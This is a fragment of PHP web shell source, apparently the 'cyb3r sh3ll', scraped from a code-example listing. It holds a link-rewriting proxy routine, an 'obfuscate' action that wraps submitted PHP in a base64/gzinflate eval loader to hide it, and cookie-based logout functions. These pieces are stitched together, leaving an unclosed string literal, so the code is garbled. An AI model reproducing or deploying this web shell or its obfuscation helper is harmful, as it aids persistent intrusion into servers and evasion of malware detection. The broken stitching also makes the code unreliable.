$con = str_replace("href=\"mailto", "HrEf=\"mailto", $con);
                    $con = str_replace("HREF=\"mailto", "HrEf=\"mailto", $con);
                    $con = str_replace("href=\\'mailto", "HrEf=\"mailto", $con);
                    $con = str_replace("HREF=\\'mailto", "HrEf=\"mailto", $con);
                    $con = str_replace("href=\"http", "HrEf=\"" . hlinK("seC=px&urL=http"), $con);
                    $con = str_replace("HREF=\"http", "HrEf=\"" . hlinK("seC=px&urL=http"), $con);
                    $con = str_replace("href=\\'http", "HrEf=\"" . hlinK("seC=px&urL=http"), $con);
                    $con = str_replace("HREF=\\'http", "HrEf=\"" . hlinK("seC=px&urL=http"), $con);
                    $con = str_replace("href=http", "HrEf=" . hlinK("seC=px&urL=http"), $con);
                    $con = str_replace("HREF=http", "HrEf=" . hlinK("seC=px&urL=http"), $con);
                    $con = str_replace("href=\"", "HrEf=\"" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), $con);
                    $con = str_replace("HREF=\"", "HrEf=\"" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), $con);
                    $con = str_replace("href=\"", "HrEf=\\'" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), $con);
                    $con = str_replace("HREF=\"", "HrEf=\\'" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), $con);
                    $con = str_replace("href=", "HrEf=" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), $con);
                    $con = str_replace("HREF=", "HrEf=" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), $con);
                    echo $con;
                }
                fclose($url);
            }
        }
        if ($act == "obfuscate") {
            if (isset($_POST['code']) && $_POST['code'] != '') {
                $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'] . ' '), '<?php,?>'), 9));
                // high Compression! :P
                $encode = '
<?php
$encoded = \'' . $encoded . '\';
eval(gzinflate(base64_decode($encoded)));
// Encoded by cyb3r sh3ll. Thanx lionaneesh for this idea.
?>
function logouT()
{
    setcookie('passw', '', time() - 10000);
    header('Location: ' . hlinK());
}
Example #3
0
function logouT()
{
    echo "<script type='text/javascript'>\ndocument.cookie = 'passw=; path=/';\ndocument.cookie = '501=; path=/';\nwindow.location = '" . hlinK() . "'\n</script>";
}